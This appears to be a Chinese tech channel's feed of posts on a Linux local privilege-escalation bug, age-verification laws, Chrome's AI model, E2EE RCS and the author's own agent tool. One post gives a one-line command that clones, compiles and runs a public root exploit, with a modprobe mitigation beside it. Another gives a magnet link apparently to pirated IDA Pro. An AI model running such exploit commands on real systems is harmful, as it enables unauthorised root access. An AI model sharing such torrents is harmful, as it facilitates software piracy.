Based.
https://blog.feld.me/posts/2026/04/open-source-does-not-imply-open-community/

不是吧，又来一个 Linux universal LPE

https://www.openwall.com/lists/oss-security/2026/05/07/8
https://github.com/V4bel/dirtyfrag

git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

Mitigation:

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true"

对了忘记转发 IDA Pro 9.3 SP2 了

magnet:?xt=urn:btih:57bd6e22aa74309330f6613c0cf9302edd1c586e&dn=ida93sp2

推荐一下这篇 AI 毒品的论文

https://www.ai-wellbeing.org/paper.pdf
https://www.ai-wellbeing.org/
https://zhuanlan.zhihu.com/p/2035091757071853364

相信你们也都看到了这个

https://cyberinsider.com/eu-calls-vpns-a-loophole-that-needs-closing-in-age-verification-push/

让政府来代替家长就会是这么个无底洞，先要求声明年龄，发现人是可以撒谎的就开始要求上传身份证，然后还是拦不住因为有 VPN，再 ban 掉 VPN 最后你发现自己和中国没什么区别了

如果数据真的留在设备上，为什么需要改措辞？对 ToS 和隐私政策（其次是产品说明）的改动是最能体现公司的价值观和实际目标的

https://cybernews.com/ai-news/chrome-removes-ai-privacy-wording-google-says-data-still-stays-on-device/

前情提要：Chrome 会静默在后台下载 4GB 的AI 模型

https://tech.yahoo.com/ai/gemini/article/google-chrome-sneakily-installed-a-4gb-ai-file-on-your-computer-but-its-not-exactly-new--heres-what-you-need-to-know-161905426.html

惊了这游戏居然有第二个预告了
Sukeban 也太咕了每一个游戏都是有生之年

https://www.youtube.com/watch?v=3mRg9SpdO6E

拓竹正在滥用开源社会契约
原文：https://www.jeffgeerling.com/blog/2026/bambu-lab-abusing-open-source-social-contract/
阅读时间：3 分钟
分数：724 🔥🔥

我说最近 Louis 怎么跟拓竹杠上了

搓了一个 dbus idle monitor，让你的 i3 和其它 wm 也可以用 1Password 的自动锁定
https://github.com/k4yt3x/idlemon

感谢 @Integral_Tech 的光速 AUR
https://aur.archlinux.org/packages/idlemon

iOS 26.5 支持 E2EE RCS 了
说实话没想到 E2EE 有朝一日真能上 carrier SMS
https://www.eff.org/deeplinks/2026/05/victory-end-end-encrypted-rcs-comes-apple-and-android-chats

加州在考虑修正 AB 1043 了，看到社区的抗议成功取得阶段性成果还是挺令人开心的

不过我不是很吃掀房顶 -> 开窗这一套，往其它 OS 里塞年龄信息仍然不是什么好主意，希望 EFF 之类的组织能继续推动废除 1043

https://www.tomshardware.com/software/linux/california-moves-to-exempt-linux-from-its-upcoming-age-verification-law-after-backlash-over-forcing-operating-systems-to-collect-users-ages-amendment-proposed-by-the-same-lawmaker-who-wrote-the-original-law

收集信息的理由很多，最后结果都一样

还是那句话，最好的信息安全就是信息从来就没收集过

https://techxplore.com/news/2026-05-online-age-pointless-privacy.html

https://mikespecter.com/assets/pdf/AgeVerification.pdf

论文摘要的翻译：

自 2022 年以来，覆盖美国超过 40% 人口的 25 个州已经通过法律，强制要求含有"对未成年人有害"内容的网站验证其用户的年龄。据广泛报道，许多遵守这些法律的网站依赖第三方服务，实际上将年龄验证流程外包出去。然而，人们对这些服务如何塑造网络、如何影响用户隐私却知之甚少。

在本研究中，我们对网络上的年龄验证服务提供商展开了首次大规模探索。我们首先考察来自三个不同州的 CrUX 排名前一百万的网站——其中两个州有法定的年龄验证强制要求，一个州没有——以识别年龄验证服务的普及程度与构成情况。随后，我们对占主导地位的年龄验证提供商 Yoti 进行了逆向工程，并提供了深入的隐私分析。

我们的研究结果表明，年龄验证服务在限制未成年人方面可能并不有效，反而给终端用户带来了重大的新隐私风险，并正在引发美国网络首次出现的跨州"巴尔干化"（割裂）现象。我们发现，Yoti 往往要求终端用户共享敏感数据——包括面部照片、政府身份证件、信用卡信息、浏览器指纹数据、所访问的网站等等。这些数据不仅可能被托付给签约的服务提供商，还可能被托付给若干对用户而言透明度低得多的"第四方"。我们识别出了若干安全与隐私问题，并将这些发现与近期最高法院判例所依据的关键假设联系起来。

我感觉该解释一下我为什么搓这个玩意儿，和现有的那么多 harness 有什么区别

- 老派的 Open WebUI 的 native tool call 一塌糊涂而且没有文件系统和沙箱命令执行之类的功能做复杂分析

- CC/Codex/Pi 之类的 harness 不错但是整个框架设计就是以你在写代码为前提，自带一堆安全限制和冗余功能比如自动加载 AGENTS.md 和集成 Git/LSP，CC 还收集大量系统和遥测数据，都太重而且不灵活不好集成到自动化工作流里；我就想要一个简单的 agent 二进制，运行就可以直接在系统里像用户一样操作系统（其实这一点和名称由来有关）

- OpenClaw 虽然理论上功能强大但是过于膨胀而且我信不过那个庞杂社区的代码质量

- 我不喜欢这些框架一个终端程序都要 TypeScript 写，甚至 CC 用 React 在终端做游戏引擎；就直接 REPL 模式直接给输出 markdown 上色就完了哪有那么多花里胡哨的

- 自己的框架，要什么功能随时加，不用开 issue 等 PR 再等 PR merge 到主线，还可拿着 agent 干完活对 tool 的反馈直接去改进 tool

可能不是最好的，但是还是自己量身定制的用着爽，我的也不一定适合你，所以现在用 agent 搓 agent 这么简单我推荐你有需求也试试搓一个自己的